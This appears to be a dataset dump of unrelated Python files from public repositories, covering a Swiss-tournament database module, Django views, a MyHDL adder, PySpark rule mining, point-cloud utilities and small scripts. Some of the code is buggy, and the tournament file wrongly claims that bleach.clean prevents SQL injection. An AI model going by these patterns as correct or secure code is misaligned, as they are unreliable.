id number for the player. (This\n should be handled by your SQL database schema, not in your Python code.)\n\n Returns:\n A dictionary with:\n player_id: An integer storing the player's id. This can be used for\n registering the player in future tournaments.\n tournament: An integer representing the tournament id the player is registered\n for. This can be used to register other players in the same\n tournament.\n\n Args:\n name: the player's full name (need not be unique).\n tournament: (optional) specifies which tournament to register the player for.\n Specify 0 to register the player for the next tournament.\n Defaults to 0 if not specified.\n player_id: (optional) if the player has registered for a previous tournament,\n they can register for a new tournament with their player_id. If a\n player_id is specified, the player is added to the tournament without\n creating a new player record. A player_id of 0 means the player is\n new and needs to be created. Defaults to 0.\n \"\"\"\n\n # if player_id is 0, create the new player and get the player's id\n if player_id == 0:\n player_id = execute_query_fetchall(\"INSERT INTO players (name) VALUES (%s) RETURNING player_id\", [name])[0][0]\n\n \"\"\" if tournament = 0, add the player to the next tournament, which will be after\n the latest tournament\n \"\"\"\n if tournament == 0:\n last_tournament = execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_matches\")[0][0]\n tournament = int(0 if last_tournament is None else last_tournament) + 1\n\n execute_query(\"INSERT INTO tournament_roster (tournament_id, player_id, had_bye) VALUES (%s, %s, FALSE)\",\n [bleach.clean(tournament), bleach.clean(player_id)])\n\n return {'player_id': player_id, 'tournament': tournament}\n\ndef playerStandings(tournament=0):\n \"\"\"Returns a list of the players and their win records for a specified tournament.\n Sorted based on winning percentage. A draw counts as 1/2 a win. Due to the output\n expected by the test cases, draw data is not included in the output, however it is\n used for sorting the players.\n\n The first entry in the list should be the player in first place, or a player\n tied for first place if there is currently a tie.\n\n Returns:\n A list of tuples, each of which contains (id, name, wins, matches):\n id: the player's unique id (assigned by the database)\n name: the player's full name (as registered)\n wins: the number of matches the player has won.\n matches: the number of matches the player has played\n\n Args:\n tournament: (optional) specifies which tournament to get the standings for.\n Specify 0 to get the results of the most recent tournament.\n Defaults to 0 if not specified.\n \"\"\"\n # if tournament is 0, get the lastest tournament\n if tournament == 0:\n tournament = int(execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_roster\")[0][0])\n\n sql_query = \"SELECT pr.player_id, p.name, pr.wins, pr.matches FROM player_rankings pr, players p \\\n WHERE pr.tournament_id = %s AND pr.player_id = p.player_id ORDER BY pr.points\"\n\n return execute_query_fetchall(sql_query, [bleach.clean(tournament)])\n\ndef reportMatch(winner, loser, draw=False, tournament=0):\n \"\"\"Records the outcome of a single match between two players.\n\n Args:\n winner: the id number of the player who won. *(see note regarding draws below)\n loser: the id number of the player who lost. *(see note regarding draws below)\n draw: (optional) specifies if the match was a draw.\n tournament: (optional) specifies which tournament the match was played in.\n Specify 0 to report a match for the most recent tournament.\n Defaults to 0 if not specified.\n\n Note:\n * If the match is a draw, the args 'winner' and 'loser' are just used to identify\n the two different players. The result will be recorded as a draw for both players,\n rather than a win or loss.\n \"\"\"\n\n # if tournament is 0, get the lastest tournaments\n if tournament == 0:\n tournament = int(execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_roster\")[0][0])\n\n # ensure input values are clean to prevent SQL Injection attacks\n winner = bleach.clean(winner)\n loser = bleach.clean(loser)\n tournament = bleach.clean(tournament)\n\n if draw:\n execute_query(\"INSERT INTO tournament_matches (player1_id, player2_id, draw, tournament_id) \\\n VALUES (%s, %s, TRUE, %s)\", [winner, loser, tournament])\n else:\n execute_query(\"INSERT INTO tournament_matches (player1_id, player2_id, draw, winner_id, tournament_id) \\\n VALUES (%s, %s, FALSE, %s, %s)\", [winner, loser, winner, tournament])\n\ndef swissPairings(tournament=0):\n \"\"\"Returns a list of pairs of players for the next round of a match.\n\n Assuming that there are an even number of players registered, each player\n appears exactly once in the pairings. Each player is paired with another\n player with an equal or nearly-equal win record, that is, a player adjacent\n to him or her in the standings.\n\n If there are an odd number of players, one player will receive a bye, which will\n count as an automatic win. A player may only receive one bye per tournament.\n\n Returns:\n A list of tuples, each of which contains (id1, name1, id2, name2)\n id1: the first player's unique id\n name1: the first player's name\n id2: the second player's unique id. Set to 0 in the case of a bye.\n name2: the second player's name. Set to 'Bye' in the case of a bye.\n\n Args:\n tournament: (optional) specifies which tournament to get the standings for.\n Specify 0 to get the results of the most recent tournament.\n Defaults to 0 if not specified.\n\n \"\"\"\n # if tournament is 0, get the lastest tournaments\n if tournament == 0:\n tournament = int(execute_query_fetchall(\"SELECT MAX(tournament_id) FROM tournament_roster\")[0][0])\n\n #ensure input data is clean to prevent SQL injection attacks\n bleach.clean(tournament)\n \n standings = playerStandings(tournament)\n pairings = []\n\n # Check if we have an odd number of players. If so, randomly give a player a bye.\n # Only players who have not yet had a bye are eligble.\n if len(standings) % 2 == 1:\n sql_query = \"SELECT p.player_id, p.name FROM tournament_roster tr, player p \\\n WHERE tr.tournament_id = %s AND NOT had_bye AND tr.player_id = p.player_id \\\n ORDER BY RAND() LIMIT 1\"\n results = execute_query_fetchall(sql_query, [tournament])\n bye_player_id = results[0][0]\n bye_player_name = results[0][1]\n for player in standings:\n if bye_player == player[0]:\n pairings.append((bye_player, bye_player_name, 0, \"BYE\"))\n standings.remove(player)\n break\n\n pairings.extend([(standings[i][0], standings[i][1], standings[i+1][0], standings[i+1][1]) for i in range(0,len(standings),2)])\n\n return pairings\n","repo_name":"cacrookes/udacity-fsd-proj2","sub_path":"tournament.py","file_name":"tournament.py","file_ext":"py","file_size_in_byte":12036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10789106655","text":"# Time: O(1)\n# Space: O(1)\n\nclass Solution(object):\n def findIntegers(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n dp = [0] * 32\n dp[0], dp[1] = 1, 2\n for i in xrange(2, len(dp)):\n dp[i] = dp[i-1] + dp[i-2]\n result, prev_bit = 0, 0\n for i in reversed(xrange(31)):\n if (num & (1 << i)) != 0:\n result += dp[i]\n if prev_bit == 1:\n result -= 1\n break\n prev_bit = 1\n else:\n prev_bit = 0\n return result + 1\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/non-negative-integers-without-consecutive-ones.py","file_name":"non-negative-integers-without-consecutive-ones.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"11762997102","text":"from django.shortcuts import render\nfrom datetime import datetime\n# Create your views here.\n\n\ndef prd(request):\n add = ['Cumberland', 'Hyatt Churchil', 'Hilton London on Park Lane', 'Amba Marble Arch',\n 'Corus Hyde Park', 'Bayswater Hotel', 'Royal National London']\n htl = 'Add Hotel/Service Apartment/Lodge/B&B'\n att = 'Add Attraction'\n tic = 'Add Tickets'\n trf = 'Add Transfers'\n d = datetime.now()\n prd_detail = {'ht':htl, 'at':att, 'ti': tic, 'tr': trf, 'dt': d, 'ads':add}\n return render(request, 'products/prd.html', context=prd_detail)\n\n\ndef hotel(request):\n return render(request, 'products/hotel.html')\n","repo_name":"rishipalsingh9/portfolio1","sub_path":"django-projects/europeous/products/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"34554683690","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nimport json\n\nfrom user.models import User\nfrom .models import FollowRequest, FollowList\n\n\ndef follow_list_view(request, *args, **kwargs):\n\tcontext = {}\n\tuser = request.user\n\tif user.is_authenticated:\n\t\tuser_id = kwargs.get(\"user_id\")\n\t\tif user_id:\n\t\t\ttry:\n\t\t\t\tthis_user = User.objects.get(pk=user_id)\n\t\t\t\tcontext['this_user'] = this_user\n\t\t\texcept User.DoesNotExist:\n\t\t\t\treturn HttpResponse(\"That user does not exist\")\n\t\t\ttry:\n\t\t\t\tfollow_list = FollowList.objects.get(user=this_user)\n\t\t\texcept FollowList.DoesNotExist:\n\t\t\t\treturn HttpResponse(f\"Could not find a follow list for {this_user.username}\")\n\n\t\t\t# Must be our following to view list\n\t\t\tif user != this_user:\n\t\t\t\tif not user in follow_list.following.all() or follow_list.follower.all():\n\t\t\t\t\treturn HttpResponse(\"You must be related to view their follow listings\")\n\t\t\tfollowings = [] # [(following1, True), (following2, False), ...]\n\t\t\tfollowers = []\n\t\t\t# get the authenticated users following list\n\t\t\tauth_user_follow_list = FollowList.objects.get(user=user)\n\t\t\tfor following in follow_list.following.all():\n\t\t\t\tfollowings.append((following, auth_user_follow_list.is_following(following)))\n\t\t\tfor follower in follow_list.follower.all():\n\t\t\t\tfollowers.append((follower, auth_user_follow_list.is_follower(follower)))\n\t\t\tcontext['followings'] = followings\n\t\t\tcontext['followers'] = followers\n\telse:\n\t\treturn HttpResponse(\"You must be related to view their follow listings\")\n\treturn render(request, \"follow/follow_list.html\", context)\n\n\ndef follow_requests(request, *args, **kwargs):\n\tcontext = {}\n\tuser = request.user\n\tif user.is_authenticated:\n\t\tuser_id = kwargs.get(\"user_id\")\n\t\taccount = User.objects.get(pk=user_id)\n\t\tif account == user:\n\t\t\tfollow_requests = FollowRequest.objects.filter(receiver=account, is_active=True)\n\t\t\tcontext['follow_requests'] = follow_requests\n\t\telse:\n\t\t\treturn HttpResponse(\"You can't view another users follow requests\")\n\telse:\n\t\tredirect(\"login\")\n\treturn render(request, \"follow/follow_requests.html\", context)\n\n\ndef send_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\treceiver = User.objects.get(pk=user_id)\n\t\t\ttry:\n\t\t\t\t# Get any follow requests (active and not-active)\n\t\t\t\tfollow_requests = FollowRequest.objects.filter(sender=user, receiver=receiver)\n\t\t\t\t# find if any of them are active (pending)\n\t\t\t\ttry:\n\t\t\t\t\tfor request in follow_requests:\n\t\t\t\t\t\tif request.is_active:\n\t\t\t\t\t\t\traise Exception(\"You already sent them a request\")\n\t\t\t\t\t# If none are active create a new follow request\n\t\t\t\t\tfollow_request = FollowRequest(sender=user, receiver=receiver)\n\t\t\t\t\tfollow_request.save()\n\t\t\t\t\tpayload['response'] = \"Request sent\"\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tpayload['response'] = str(e)\n\t\t\texcept FollowRequest.DoesNotExist:\n\t\t\t\t# There are no requests so create one.\n\t\t\t\tfollow_request = FollowRequest(sender=user, receiver=receiver)\n\t\t\t\tfollow_request.save()\n\t\t\t\tpayload['response'] = \"Request sent\"\n\n\t\t\tif payload['response'] == None:\n\t\t\t\tpayload['response'] = \"Something went wrong\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to sent a request\"\n\telse:\n\t\tpayload['response'] = \"You must be authenticated to send a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\ndef accept_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"GET\" and user.is_authenticated:\n\t\tfollow_request_id = kwargs.get(\"follow_request_id\")\n\t\tif follow_request_id:\n\t\t\tfollow_request = FollowRequest.objects.get(pk=follow_request_id)\n\t\t\t# confirm that is the correct request\n\t\t\tif follow_request.receiver == user:\n\t\t\t\tif follow_request:\n\t\t\t\t\t# found the request. Now accept it\n\t\t\t\t\tupdated_notification = follow_request.accept()\n\t\t\t\t\tpayload['response'] = \"Request accepted\"\n\n\t\t\t\telse:\n\t\t\t\t\tpayload['response'] = \"Something went wrong\"\n\t\t\telse:\n\t\t\t\tpayload['response'] = \"That is not your request to accept\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to accept that request\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to accept a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\ndef remove_follower(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\ttry:\n\t\t\t\tremovee = User.objects.get(user=user)\n\t\t\t\tfollow_list = FollowList.objects.get(pk=user_id)\n\t\t\t\tfollow_list.unfollow(removee)\n\t\t\t\tpayload['response'] = \"Successfully removed that follower\"\n\t\t\texcept Exception as e:\n\t\t\t\tpayload['response'] = f\"Something went wrong: {str(e)}\"\n\t\telse:\n\t\t\tpayload['response'] = \"There was an error. Unable to remove that follower\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to remove a follower\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\ndef remove_following(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\ttry:\n\t\t\t\tremovee = User.objects.get(pk=user_id)\n\t\t\t\tfollow_list = FollowList.objects.get(user=user)\n\t\t\t\tfollow_list.unfollow(removee)\n\t\t\t\tpayload['response'] = \"Successfully removed you as follower\"\n\t\t\texcept Exception as e:\n\t\t\t\tpayload['response'] = f\"Something went wrong: {str(e)}\"\n\t\telse:\n\t\t\tpayload['response'] = \"There was an error. Unable to remove you as follower\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to remove yourself as follower\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\n\ndef decline_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"GET\" and user.is_authenticated:\n\t\tfollow_request_id = kwargs.get(\"follow_request_id\")\n\t\tif follow_request_id:\n\t\t\tfollow_request = FollowRequest.objects.get(pk=follow_request_id)\n\t\t\t# confirm that is the correct request\n\t\t\tif follow_request.receiver == user:\n\t\t\t\tif follow_request:\n\t\t\t\t\t# found the request. Now decline it\n\t\t\t\t\tupdated_notification = follow_request.decline()\n\t\t\t\t\tpayload['response'] = \"Request declined\"\n\t\t\t\telse:\n\t\t\t\t\tpayload['response'] = \"Something went wrong\"\n\t\t\telse:\n\t\t\t\tpayload['response'] = \"That is not your request to decline\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to decline that request\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to decline a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\n\n\ndef cancel_follow_request(request, *args, **kwargs):\n\tuser = request.user\n\tpayload = {}\n\tif request.method == \"POST\" and user.is_authenticated:\n\t\tuser_id = request.POST.get(\"receiver_user_id\")\n\t\tif user_id:\n\t\t\treceiver = User.objects.get(pk=user_id)\n\t\t\ttry:\n\t\t\t\tfollow_requests = FollowRequest.objects.filter(sender=user, receiver=receiver, is_active=True)\n\t\t\texcept FollowRequest.DoesNotExist:\n\t\t\t\tpayload['response'] = \"Nothing to cancel. Request does not exist\"\n\n\t\t\t# There should only ever be ONE active follow request at any given time. Cancel them all just in case.\n\t\t\tif len(follow_requests) > 1:\n\t\t\t\tfor request in follow_requests:\n\t\t\t\t\trequest.cance()\n\t\t\t\tpayload['response'] = \"Request canceled\"\n\t\t\telse:\n\t\t\t\t# found the request. Now cancel it\n\t\t\t\tfollow_requests.first().cancel()\n\t\t\t\tpayload['response'] = \"Request canceled\"\n\t\telse:\n\t\t\tpayload['response'] = \"Unable to cancel that request\"\n\telse:\n\t\t# should never happen\n\t\tpayload['response'] = \"You must be authenticated to cancel a request\"\n\treturn HttpResponse(json.dumps(payload), content_type=\"application/json\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Dorfeuheinz/socio","sub_path":"follow/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31176624876","text":"@block\ndef bit_adder(oper_a, oper_b, res_sum, oper_cin, oper_cout):\n\n\t@always_comb\n\tdef logic():\n\t\tfor i in range(5):\n\t\t\tres_sum.next[i] = oper_a[i] ^ (oper_b[i] ^ oper_cin)\n\t\t\toper_cout.next = (oper_b[i] & (not oper_cin)) | (oper_a[i] & (not oper_cin)) | (oper_a[i] & oper_b[i])\n\n\treturn instances()\n\ndef testbench():\n\toper_a, oper_b = [Signal(intbv(0)[5:]) for i in range(2)]\n\toper_cin, oper_cout = [Signal(bool()) for i in range(2)]\n\n\toper_sum = Signal(intbv(0)[5:])\n\tprocess = bit_adder(oper_a, oper_b, oper_sum, oper_cin, oper_cout)\n\n\t@always_comb\n\tdef update_cin():\n\t\toper_cin.next = oper_cout\n\n\t@instance\n\tdef stimulus():\n\t\tfor i in range(20):\n\t\t\toper_a.next, oper_b.next = randrange(16), randrange(16)\n\t\t\tyield delay(1)\n\t\t\tprint (oper_a, oper_b, oper_sum)\n\t\t\tprint (bin(oper_a), bin(oper_b), bin(oper_sum), oper_cin)\n\t\t\tprint (\"\")\n\n\n\treturn instances();\n\ninst = testbench()\nsim = Simulation(inst)\nsim.run(50)\n","repo_name":"abhisheietk/MyHDL_tutorial","sub_path":"fulladder.py","file_name":"fulladder.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26908393655","text":"from turtle import Turtle\r\nimport random\r\n\r\nMOVE_DISTANCE = 10\r\nDIRECTION = [45, 135, 225, 315]\r\nSPEED = 'slowest'\r\n\r\nclass Ball(Turtle):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n self.shape('square')\r\n self.color('white')\r\n self.penup()\r\n self.speed(SPEED)\r\n self.shapesize(0.5, 0.5, 0.5)\r\n\r\n\r\n def start_game(self):\r\n self.goto(0, 0)\r\n start_direction = random.choice(DIRECTION)\r\n self.setheading(start_direction)\r\n\r\n\r\n def move(self):\r\n self.forward(MOVE_DISTANCE)\r\n","repo_name":"quici9/pong-game","sub_path":"ball.py","file_name":"ball.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26170276637","text":"from itertools import combinations\nfrom pathlib import Path\n\nfrom pyspark.sql import SparkSession\n\nfrom src.apriori import get_apriori_rules_and_dictionary\nfrom src.fpgrowth import get_fp_growth_rules_and_dictionary\nfrom src.measures import get_confidence, get_lift, get_conviction\n\nthreshold = 50\napriori_iterations = 3\n\n\ndef get_data_rdd(session, file_name):\n rdd = session.sparkContext.textFile('../resources/' + file_name + '.txt').map(lambda x: x.split(\",\"))\n return rdd\n\n\ndef get_rule_string(antecedent, consequent):\n antecedent_list = list(antecedent)\n consequent_list = list(consequent)\n antecedent_list.sort()\n consequent_list.sort()\n result = ' '.join('<{}>'.format(i) for i in antecedent_list)\n result = result + \" [\" + ' '.join('<{}>'.format(i) for i in consequent_list) + \"] \"\n return result\n\n\ndef save_rules(support_dictionary, get_measure, result_file_name, rules):\n association_rules_measures = list(map(lambda x: (x, get_measure(support_dictionary, x[0], x[1]),\n get_rule_string(x[0], x[1])), rules))\n association_rules_measures.sort(key=lambda x: (-x[1], x[2]))\n Path(\"../resources/\").mkdir(parents=True, exist_ok=True)\n for rule_measure in association_rules_measures:\n rule_size = len(rule_measure[0][0]) + len(rule_measure[0][1])\n with open('../resources/' + result_file_name + str(rule_size) + '.txt', 'a') as f:\n f.write(rule_measure[2] + \" <\" + str(rule_measure[1]) + \">\\n\")\n\n\nif __name__ == \"__main__\":\n spark_session = SparkSession.builder.getOrCreate()\n data_rdd = get_data_rdd(spark_session, 'users_genres')\n association_rules, support_dictionary = get_apriori_rules_and_dictionary(data_rdd, apriori_iterations, threshold)\n save_rules(support_dictionary, get_confidence, 'confidence_results_new', association_rules)\n save_rules(support_dictionary, get_lift, 'lift_results_new', association_rules)\n save_rules(support_dictionary, get_conviction, 'conviction_results_new', association_rules)\n\n association_rules = get_fp_growth_rules_and_dictionary(data_rdd, threshold)\n save_rules(support_dictionary, get_confidence, 'confidence_results_fp', association_rules)\n save_rules(support_dictionary, get_lift, 'lift_results_fp', association_rules)\n save_rules(support_dictionary, get_conviction, 'conviction_results_fp', association_rules)\n\n print('found rules...')","repo_name":"MateuszKuzniarek/SteamProject","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41493051863","text":"import numpy as np\nimport torch\n\nfrom utils.common_utils import check_numpy_to_torch\n\n\ndef rotate_points_along_z(points, angle):\n \"\"\"\n\n Args:\n points: ndarray, [B, N, 3 + C]\n angle: ndarray, [B], angle along z-axis, angle increases x ==> y\n\n Returns:\n\n \"\"\"\n points, is_numpy = check_numpy_to_torch(points)\n angle, _ = check_numpy_to_torch(angle)\n\n cosa = torch.cos(angle)\n sina = torch.sin(angle)\n zeros = angle.new_zeros(points.shape[0])\n ones = angle.new_ones(points.shape[0])\n rot_matrix = torch.stack((\n cosa, sina, zeros,\n -sina, cosa, zeros,\n zeros, zeros, ones\n ), dim=1).view(-1, 3, 3).float()\n points_rot = torch.matmul(points[:, :, 0:3], rot_matrix)\n points_rot = torch.cat((points_rot, points[:, :, 3:]), dim=-1)\n\n return points_rot.numpy() if is_numpy else points_rot\n\n\ndef mask_points_by_range(points, limit_range):\n \"\"\"\n\n Args:\n points: ndarray, [N, 3 + C]\n limit_range: (xmin, ymin, zmin, xmax, ymax, zmax)\n\n Returns:\n\n \"\"\"\n mask = (points[:, 0] >= limit_range[0]) & (points[:, 0] <= limit_range[3]) \\\n & (points[:, 1] >= limit_range[1]) & (points[:, 1] <= limit_range[4])\n\n return points[mask]\n\n\ndef get_fov_flag(points, image_shape, calib):\n \"\"\"\n\n Args:\n points: ndarray, [N, 3 + C]\n image_shape: ndarray, [2], H and W\n calib: kitti_calibration_utils.Calibration\n\n Returns:\n\n \"\"\"\n pts_rect = calib.lidar_to_rect(points[:, 0:3])\n pts_img, pts_rect_depth = calib.rect_to_img(pts_rect)\n\n val_flag_1 = np.logical_and(pts_img[:, 0] >= 0, pts_img[:, 0] < image_shape[1])\n val_flag_2 = np.logical_and(pts_img[:, 1] >= 0, pts_img[:, 1] < image_shape[0])\n val_flag_merge = np.logical_and(val_flag_1, val_flag_2)\n\n mask = np.logical_and(val_flag_merge, pts_rect_depth >= 0)\n\n return mask\n","repo_name":"shangjie-li/mvmm","sub_path":"utils/point_cloud_utils.py","file_name":"point_cloud_utils.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"40"} +{"seq_id":"11634503718","text":"#\n# @lc app=leetcode.cn id=23 lang=python3\n#\n# [23] 合并K个升序链表\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nfrom heapq import heappush, heappop\n\nclass Solution:\n def mergeKLists(self, lists: List[ListNode]) -> ListNode:\n heap = list()\n for cur_ind, cur_node in enumerate(lists):\n if cur_node is not None:\n heappush(heap, (cur_node.val, cur_ind, cur_node))\n \n head = ListNode()\n cur_node = head\n \n while len(heap) > 0:\n _, cur_list_ind, cur_min_node = heappop(heap)\n cur_node.next = cur_min_node\n cur_node = cur_min_node\n \n if cur_min_node.next is not None:\n heappush(heap, (cur_min_node.next.val, cur_list_ind, cur_min_node.next))\n \n return head.next\n \n \n# @lc code=end\n\n","repo_name":"HawChang/LeetCode","sub_path":"23.合并k个升序链表.py","file_name":"23.合并k个升序链表.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26126464458","text":"import os\r\nimport cv2\r\n\r\npath = 'images'\r\nimages = []\r\n\r\nfor file in os.listdir(path):\r\n name, ext = os.path.splitext(file)\r\n\r\n if ext in ['.png', '.jpeg', '.jfif', '.jpg']:\r\n images.append(path + '/' + file)\r\n \r\n\r\nframe = cv2.imread(images[0])\r\nheight, width, channels = frame.shape\r\nsize = (width, height)\r\nfps = 0.5\r\n\r\nvideoWrite = cv2.VideoWriter(\"Project Output.mp4\", cv2.VideoWriter_fourcc(*'mp4v'), fps, size)\r\nfor i in range(0, len(images), 1):\r\n frame = cv2.imread(images[i])\r\n videoWrite.write(frame)\r\n\r\nvideoWrite.release()\r\nprint(\"Done!\")","repo_name":"dhairyapolkundwar/PRO-C105","sub_path":"CreateVideo.py","file_name":"CreateVideo.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"28160018526","text":"import realtimeInputTest as realtime\nimport pyaudio\nfrom pydub import AudioSegment\nfrom pydub.playback import play\n\nsound1 = AudioSegment.from_file(\"moonlight_sonata.wav\")\nsound1_channels = sound1.split_to_mono()\nsound1 = sound1_channels[0].overlay(sound1_channels[1])\nsound1 = sound1 - 30 # make sound1 quiter 30dB so that noise is clearly hearable\n\n\nMODE = \"NOISE_CANCELING_ON\"\n\nFORMAT = pyaudio.paInt16\nCHANNELS = 1\nRATE = 44100\nCHUNK = 1024\n\n\naudio = pyaudio.PyAudio()\naudio2 = pyaudio.PyAudio()\n\nplayer = audio.open(format=FORMAT, channels=CHANNELS, rate=RATE, output=True, frames_per_buffer=CHUNK)\nplayer2 = audio2.open(format=FORMAT, channels=CHANNELS, rate=RATE, output=True, frames_per_buffer=CHUNK)\n\nMICROPHONENAME = \"Realtek High Defini\"\nMICROPHONEINDEX = 2\n\nMICROPHONENAME2 = \"Realtek High Defini\"\nMICROPHONEINDEX2 = 2\n\ndef main():\n realtime.micro_selection(MICROPHONEINDEX, MICROPHONENAME, audio)\n realtime.audio_recording(audio, MODE)\n\nif __name__ == \"__main__\":\n main()","repo_name":"Haegar98/Embedded-Systems","sub_path":"Src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41065341948","text":"\"\"\"Evaluator controller.\"\"\"\n\n# You may need to import some classes of the controller module. Ex:\n# from controller import Robot, Motor, DistanceSensor\nfrom controller import Supervisor\nfrom reward_function import *\n\nsupervisor = Supervisor()\n\n# get the time step of the current world.\ntimestep = 64\n\nilegal_contacts = {('bot_red', 'bot_blue'): -20}\n\nblock_nodes = []\nfor i in range(4):\n block_node = supervisor.getFromDef('Block_R' + str(int(i+1)))\n block_nodes.append(block_node)\n ilegal_contacts[('bot_blue','Block_R' + str(int(i+1)))] = -5\nfor i in range(4):\n block_node = supervisor.getFromDef('Block_B' + str(int(i+1)))\n block_nodes.append(block_node)\n ilegal_contacts[('bot_red','Block_B' + str(int(i+1)))] = -5\n\nrobot_nodes = [supervisor.getFromDef('bot_red'), supervisor.getFromDef('bot_blue')]\n\n\nprev_grid_score = 0 \ntotal_reward = 0 \ni =0\n# Main loop:\n# - perform simulation steps until Webots is stopping the controller\nwhile supervisor.step(timestep) != -1:\n i +=1\n time = i*timestep/1000\n current_reward, curr_grid_score = step_reward(robot_nodes, block_nodes, ilegal_contacts, prev_grid_score, time, supervisor)\n total_reward += current_reward\n current_collisions = collisions(robot_nodes, block_nodes, ilegal_contacts, supervisor)\n print(f\"reward: {current_reward}, total_reward: {total_reward}, collisions: {current_collisions}\")\n prev_grid_score = curr_grid_score\n if done(time, robot_nodes, block_nodes):\n supervisor.simulationSetMode(0)\n\n# Enter here exit cleanup code.\n","repo_name":"Sahil177/RobotRL","sub_path":"Normalworld/controllers/Evaluator/Evaluator.py","file_name":"Evaluator.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35543791308","text":"from mrjob.job import MRJob\nfrom mrjob.step import MRStep\n\nclass MRWorstRatingDay(MRJob):\n\n def mapper(self, _, line):\n user, movie, rating, genre, date = line.split(',')\n yield date, float(rating)\n\n def reducer(self, date, ratings):\n ratings_list = list(ratings)\n if ratings_list:\n yield None, (date, sum(ratings_list) / len(ratings_list))\n else:\n yield None, (date, 0)\n\n def reducer_find_worst_day(self, _, date_avg_rating_pairs):\n worst_day = min(date_avg_rating_pairs, key=lambda x: x[1])\n yield 'Worst rating day', worst_day\n\n def steps(self):\n return [\n MRStep(mapper=self.mapper,\n reducer=self.reducer),\n MRStep(reducer=self.reducer_find_worst_day)\n ]\n\nif __name__ == '__main__':\n MRWorstRatingDay.run()\n","repo_name":"jgomezb11/reto5-TET","sub_path":"reto3/WorstDay.py","file_name":"WorstDay.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37817535394","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nModule that contains tp-dcc-maya startup functionality\n\"\"\"\n\nfrom __future__ import annotations\n\nimport os\nimport sys\nimport typing\nimport inspect\nimport logging\n\nimport maya.cmds as cmds\nfrom maya.api import OpenMaya\n\nfrom tp.core import dcc\nfrom tp.bootstrap import log\nfrom tp.bootstrap.utils import env, profile\nfrom tp.bootstrap.core import manager, exceptions as bootstrap_exceptions\nfrom tp.common.python import path\nfrom tp.common.resources import api as resources\nfrom tp.maya.meta import base\n# from tp.maya.managers import scene\nfrom tp.maya.plugins import loader\nfrom tp.maya.libs.triggers import markingmenuoverride, triggercallbacks\n\nif typing.TYPE_CHECKING:\n from tp.bootstrap.core.package import Package\n\nORIGINAL_FORMAT_EXCEPTION = None\n\n\n@profile.profile\ndef startup(_: Package):\n \"\"\"\n This function is automatically called by tpDcc packages Manager when environment setup is initialized.\n 